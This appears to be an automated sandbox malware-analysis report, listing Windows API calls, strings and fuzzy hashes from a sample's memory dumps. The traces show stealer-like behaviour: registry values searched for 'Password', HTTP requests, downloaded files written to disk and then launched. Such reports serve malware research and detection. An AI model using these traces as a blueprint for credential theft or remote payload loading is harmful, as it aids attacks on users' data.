                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                      • lstrlenA.KERNEL32(00000000), ref: 00415383
                                      • strtok.MSVCRT(00000000,?), ref: 0041539E
                                      • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3532888709-1526165396
                                      • Opcode ID: c3080ecd0a6d2aaa5a38b2191e54b3eb9af717d792ebc913c1fc0f2162e4d86d
                                      • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                      • Opcode Fuzzy Hash: c3080ecd0a6d2aaa5a38b2191e54b3eb9af717d792ebc913c1fc0f2162e4d86d
                                      • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                      • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                      • StrCmpCA.SHLWAPI(?,009DC7A8), ref: 00406147
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                      • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                      • InternetCloseHandle.WININET(a+A), ref: 00406253
                                      • InternetCloseHandle.WININET(00000000), ref: 00406260
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID: a+A$a+A
                                      • API String ID: 4287319946-2847607090
                                      • Opcode ID: c7bc458361b14762599541627539190d7fbcbcfe1bc678f5eaebc030e8ecc5e4
                                      • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                      • Opcode Fuzzy Hash: c7bc458361b14762599541627539190d7fbcbcfe1bc678f5eaebc030e8ecc5e4
                                      • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                      APIs
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                      • memset.MSVCRT ref: 00920E83
                                      • lstrcat.KERNEL32(?,00000000), ref: 00920E9C
                                      • lstrcat.KERNEL32(?,00420D7C), ref: 00920EAE
                                      • lstrcat.KERNEL32(?,00000000), ref: 00920EC4
                                      • lstrcat.KERNEL32(?,00420D80), ref: 00920ED6
                                      • lstrcat.KERNEL32(?,00000000), ref: 00920EEF
                                      • lstrcat.KERNEL32(?,00420D84), ref: 00920F01
                                      • lstrlen.KERNEL32(?), ref: 00920F0E
                                      • memset.MSVCRT ref: 00920F34
                                      • memset.MSVCRT ref: 00920F48
                                        • Part of subcall function 0092AA87: lstrlen.KERNEL32(0091516C,?,?,0091516C,00420DDE), ref: 0092AA92
                                        • Part of subcall function 0092AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0092AAEC
                                        • Part of subcall function 00928DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00911660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00928DED
                                        • Part of subcall function 0092AB87: lstrcpy.KERNEL32(00000000,?), ref: 0092ABD9
                                        • Part of subcall function 0092AB87: lstrcat.KERNEL32(00000000), ref: 0092ABE9
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                        • Part of subcall function 0092AA07: lstrcpy.KERNEL32(?,00000000), ref: 0092AA4D
                                        • Part of subcall function 00929927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00920DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00929948
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00920FC1
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00920FCD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                      • String ID:
                                      • API String ID: 1395395982-0
                                      • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                      • Instruction ID: f0586f0cb9644a61abba997efb60b24c3e90fd1528a2670483c55cc34770ed2f
                                      • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                      • Instruction Fuzzy Hash: 5A8188B6540228AFCB14EBA0ED56FED7339AF94704F404199B30566086EF746B88CF5A
                                      APIs
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                      • memset.MSVCRT ref: 00920E83
                                      • lstrcat.KERNEL32(?,00000000), ref: 00920E9C
                                      • lstrcat.KERNEL32(?,00420D7C), ref: 00920EAE
                                      • lstrcat.KERNEL32(?,00000000), ref: 00920EC4
                                      • lstrcat.KERNEL32(?,00420D80), ref: 00920ED6
                                      • lstrcat.KERNEL32(?,00000000), ref: 00920EEF
                                      • lstrcat.KERNEL32(?,00420D84), ref: 00920F01
                                      • lstrlen.KERNEL32(?), ref: 00920F0E
                                      • memset.MSVCRT ref: 00920F34
                                      • memset.MSVCRT ref: 00920F48
                                        • Part of subcall function 0092AA87: lstrlen.KERNEL32(0091516C,?,?,0091516C,00420DDE), ref: 0092AA92
                                        • Part of subcall function 0092AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0092AAEC
                                        • Part of subcall function 00928DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00911660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00928DED
                                        • Part of subcall function 0092AB87: lstrcpy.KERNEL32(00000000,?), ref: 0092ABD9
                                        • Part of subcall function 0092AB87: lstrcat.KERNEL32(00000000), ref: 0092ABE9
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                        • Part of subcall function 0092AA07: lstrcpy.KERNEL32(?,00000000), ref: 0092AA4D
                                        • Part of subcall function 00929927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00920DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00929948
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00920FC1
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00920FCD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                      • String ID:
                                      • API String ID: 1395395982-0
                                      • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                      • Instruction ID: 94341bb5169143085dc2ae865f8a6209f663d9522a3e6a47021d693555487097
                                      • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                      • Instruction Fuzzy Hash: 0061A4B6500228AFCB14EBA0ED46FED7739AF94704F404199F70566086EE746B88CF5A
                                      APIs
                                        • Part of subcall function 0092AA07: lstrcpy.KERNEL32(?,00000000), ref: 0092AA4D
                                        • Part of subcall function 00914A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00914A51
                                        • Part of subcall function 00914A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00914A68
                                        • Part of subcall function 00914A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00914A7F
                                        • Part of subcall function 00914A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914AA0
                                        • Part of subcall function 00914A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914AB0
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00914B7C
                                      • StrCmpCA.SHLWAPI(?,0064A480), ref: 00914BA1
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00914D21
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 0091504F
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0091506B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 0091507F
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009150B0
                                      • InternetCloseHandle.WININET(00000000), ref: 00915114
                                      • InternetCloseHandle.WININET(00000000), ref: 0091512C
                                      • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00914D7C
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                        • Part of subcall function 0092AB87: lstrcpy.KERNEL32(00000000,?), ref: 0092ABD9
                                        • Part of subcall function 0092AB87: lstrcat.KERNEL32(00000000), ref: 0092ABE9
                                      • InternetCloseHandle.WININET(00000000), ref: 00915136
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID:
                                      • API String ID: 2402878923-0
                                      • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                      • Instruction ID: 4e9eaaf712c8ae18bd1c64f66f22c20f2dc051eaf4ae252b101bf1aa76d57713
                                      • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                      • Instruction Fuzzy Hash: 5C12FE72911228EFCB15EB90ED92FEEB379AF94700F504199B14662495EF702F88CF52
                                      APIs
                                        • Part of subcall function 0092AA07: lstrcpy.KERNEL32(?,00000000), ref: 0092AA4D
                                        • Part of subcall function 00914A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00914A51
                                        • Part of subcall function 00914A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00914A68
                                        • Part of subcall function 00914A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00914A7F
                                        • Part of subcall function 00914A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914AA0
                                        • Part of subcall function 00914A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914AB0
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                      • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00916548
                                      • StrCmpCA.SHLWAPI(?,0064A480), ref: 0091656A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0091659C
                                      • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 009165EC
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00916626
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00916638
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00916664
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009166D4
                                      • InternetCloseHandle.WININET(00000000), ref: 00916756
                                      • InternetCloseHandle.WININET(00000000), ref: 00916760
                                      • InternetCloseHandle.WININET(00000000), ref: 0091676A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID:
                                      • API String ID: 3074848878-0
                                      • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                      • Instruction ID: 4ac646d82bdb5158be677f1799da478934857950368b70b1e1cefe83e0e19a1e
                                      • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                      • Instruction Fuzzy Hash: 23713A75A40318EBDB24DFA0DC59BEEB779AF44700F108199F10AAB1D4DBB56A84CF42
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 009292D3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID:
                                      • API String ID: 2244384528-0
                                      • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                      • Instruction ID: 1f5f74d1d505bc38929e2e45a638f323b0cb00e0eb75c9b508a4d7b48a3b53d7
                                      • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                      • Instruction Fuzzy Hash: 6E710BB9A40218ABDB14EFE4DC89FEEB7B9FF49300F108508F515A7294DB34A945CB61
                                      APIs
                                      • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                      • memset.MSVCRT ref: 0041716A
                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                      Strings
                                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                      • sA, xrefs: 00417111
                                      • sA, xrefs: 004172AE, 00417179, 0041717C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: OpenProcesslstrcpymemset
                                      • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                      • API String ID: 224852652-2614523144
                                      • Opcode ID: 335029b319d1980603acda44a43de6eff4f01f1b596770656a511b732844fbe7
                                      • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                      • Opcode Fuzzy Hash: 335029b319d1980603acda44a43de6eff4f01f1b596770656a511b732844fbe7
                                      • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 009277A9
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009277E6
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0092786A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00927871
                                      • wsprintfA.USER32 ref: 009278A7
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\$B
                                      • API String ID: 1544550907-183544611
                                      • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                      • Instruction ID: 3682d3b769dcfc6307ebd1619316291b9f93746a2cadae52dab9a612163ca266
                                      • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                      • Instruction Fuzzy Hash: 64418EB1D04268EBDB10DF94DC85BEEBBB9AF48700F100199F505B7280D7796A84CBA5
                                      APIs
                                        • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                        • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                        • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                        • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                        • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                        • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                      • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                      • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                      • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                      • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                      • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                      • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                      • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                      • task.LIBCPMTD ref: 004076FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                      • String ID: :
                                      • API String ID: 3191641157-3653984579
                                      • Opcode ID: 8dce06a7de27df674dc23bf429c7e28d88ca389d661d162c9425816a7145f92b
                                      • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                      • Opcode Fuzzy Hash: 8dce06a7de27df674dc23bf429c7e28d88ca389d661d162c9425816a7145f92b
                                      • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                      APIs
                                      • lstrcpy.KERNEL32(?,?), ref: 00921642
                                        • Part of subcall function 00929047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00929072
                                        • Part of subcall function 009294C7: StrStrA.SHLWAPI(?,?), ref: 009294D3
                                      • lstrcpy.KERNEL32(?,00000000), ref: 0092167E
                                        • Part of subcall function 009294C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 009294F7
                                        • Part of subcall function 009294C7: lstrlen.KERNEL32(?), ref: 0092950E
                                        • Part of subcall function 009294C7: wsprintfA.USER32 ref: 0092952E
                                      • lstrcpy.KERNEL32(?,00000000), ref: 009216C6
                                      • lstrcpy.KERNEL32(?,00000000), ref: 0092170E
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00921755
                                      • lstrcpy.KERNEL32(?,00000000), ref: 0092179D
                                      • lstrcpy.KERNEL32(?,00000000), ref: 009217E5
                                      • lstrcpy.KERNEL32(?,00000000), ref: 0092182C
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00921874
                                        • Part of subcall function 0092AA87: lstrlen.KERNEL32(0091516C,?,?,0091516C,00420DDE), ref: 0092AA92
                                        • Part of subcall function 0092AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0092AAEC
                                      • strtok_s.MSVCRT ref: 009219B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                      • String ID:
                                      • API String ID: 4276352425-0
                                      • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                      • Instruction ID: 70c68f1210391f410ef08b9da5f8d1ec5b8bdfafda68b70553776a91f7c33713
                                      • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                      • Instruction Fuzzy Hash: 917157B695012CABCB14FBA0EC89FFE7379AF94300F044598F109A2155EE755B84CF51
                                      APIs
                                      • memset.MSVCRT ref: 00407314
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                      • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                        • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                      • task.LIBCPMTD ref: 00407555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                      • String ID: Password
                                      • API String ID: 2698061284-3434357891
                                      • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                      • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                      • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                      • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                      APIs
                                      • lstrcatA.KERNEL32(?,009DAE08,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                      • lstrcatA.KERNEL32(?,?), ref: 00414820
                                      • lstrcatA.KERNEL32(?,?), ref: 00414834
                                      • lstrcatA.KERNEL32(?,009D7040), ref: 00414847
                                      • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                      • lstrcatA.KERNEL32(?,009DB9A0), ref: 0041486F
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
